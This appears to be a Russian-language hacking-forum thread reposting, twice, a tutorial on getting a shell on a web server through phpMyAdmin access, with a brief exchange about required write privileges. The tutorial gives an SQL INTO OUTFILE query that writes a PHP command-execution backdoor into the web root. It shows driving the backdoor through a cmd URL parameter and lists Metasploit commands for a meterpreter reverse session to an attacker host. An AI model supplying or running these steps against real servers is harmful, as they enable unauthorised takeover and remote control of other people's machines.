Загрузка shell в WEB-сервер. PhpMyAdmin

[tabac]

Приветствую! В этой статье рассмотрим способ загрузки shell на целевой веб-сервер, при условии, что у нас есть доступ к phpmyadmin панели. В качестве платформы для тестов, возьмем XAMPP.

Для начала необходимо будет сгенерировать SQL запрос для выполнения вредоносного кода, а затем приложить некоторые усилия, чтобы получить полноценный доступ к удаленному хосту.

Итак, работать для начала, будем с PhpMyAdmin – это веб-приложение с открытым кодом, написанное на языке PHP и представляющее собой веб-интерфейс для администрирования СУБД MySQL. PHPMyAdmin позволяет через браузер осуществлять администрирование сервера MySQL, запускать команды SQL и просматривать содержимое таблиц и баз данных. Подробнее здесь: https://www.phpmyadmin.net

Заходим в панель управления phpmyadmin и создаем новую базу данных:

Затем, выбрав эту базу данных, идем в поле SQL, вписываем туда представленный ниже SQL запрос и выполняем его.

SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “C:\\xampp\\htdocs\\backdoor.php”

Теперь, попробуем обратиться к серверу по адресу 127.0.0.1/backdoor.php, если вы видите такой вывод, то уязвимость успешно создана:

Так же, это значит, что через строку браузера, мы можем передавать команды в cmd скомпрометированного хоста.

 127.0.0.1/backdoor.php?cmd=systeminfo

Осталось получить активную сессию meterpreter на своем хосте, для полного контроля над целевым.

Запускаем Msfconsole и используем следующий эксплоит:

 use exploit/windows/misc/regsvr32_applocker_bypass_server

 set lhost 172.16.0.192

 set lport 4444

 exploit

Выделенный текст, следует вписать как команду в адресную строку браузера, после cmd=

 127.0.0.1/backdoor.php?cmd=выделенный текст

Как результат, получаем активную сессию meterpreter:

На этом все. Спасибо за внимание.

(c) Vander
источник: codeby

 

[kali]

Приветствую! В этой статье рассмотрим способ загрузки shell на целевой веб-сервер, при условии, что у нас есть доступ к phpmyadmin панели. В качестве платформы для тестов, возьмем XAMPP.

Для начала необходимо будет сгенерировать SQL запрос для выполнения вредоносного кода, а затем приложить некоторые усилия, чтобы получить полноценный доступ к удаленному хосту.

Итак, работать для начала, будем с PhpMyAdmin – это веб-приложение с открытым кодом, написанное на языке PHP и представляющее собой веб-интерфейс для администрирования СУБД MySQL. PHPMyAdmin позволяет через браузер осуществлять администрирование сервера MySQL, запускать команды SQL и просматривать содержимое таблиц и баз данных. Подробнее здесь: https://www.phpmyadmin.net

Заходим в панель управления phpmyadmin и создаем новую базу данных:

Затем, выбрав эту базу данных, идем в поле SQL, вписываем туда представленный ниже SQL запрос и выполняем его.

SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “C:\\xampp\\htdocs\\backdoor.php”

Теперь, попробуем обратиться к серверу по адресу 127.0.0.1/backdoor.php, если вы видите такой вывод, то уязвимость успешно создана:

Так же, это значит, что через строку браузера, мы можем передавать команды в cmd скомпрометированного хоста.

 127.0.0.1/backdoor.php?cmd=systeminfo

Осталось получить активную сессию meterpreter на своем хосте, для полного контроля над целевым.

Запускаем Msfconsole и используем следующий эксплоит:

 use exploit/windows/misc/regsvr32_applocker_bypass_server

 set lhost 172.16.0.192

 set lport 4444

 exploit

Выделенный текст, следует вписать как команду в адресную строку браузера, после cmd=

 127.0.0.1/backdoor.php?cmd=выделенный текст

Как результат, получаем активную сессию meterpreter:

На этом все. Спасибо за внимание.

(c) Vander
источник: codeby

в данном примере мы юзерпхпмуадмин=рут?если юзерпхпмуадмин=!рут есть возможность стать рут,или иметь права на запись,создание файлов?

 

[Lika]

в данном примере мы юзерпхпмуадмин=рут?если юзерпхпмуадмин=!рут есть возможность стать рут,или иметь права на запись,создание файлов?

Если права на запись у пользователя есть, то сработает данный способ. Ну а если нет, то ищи другой способ.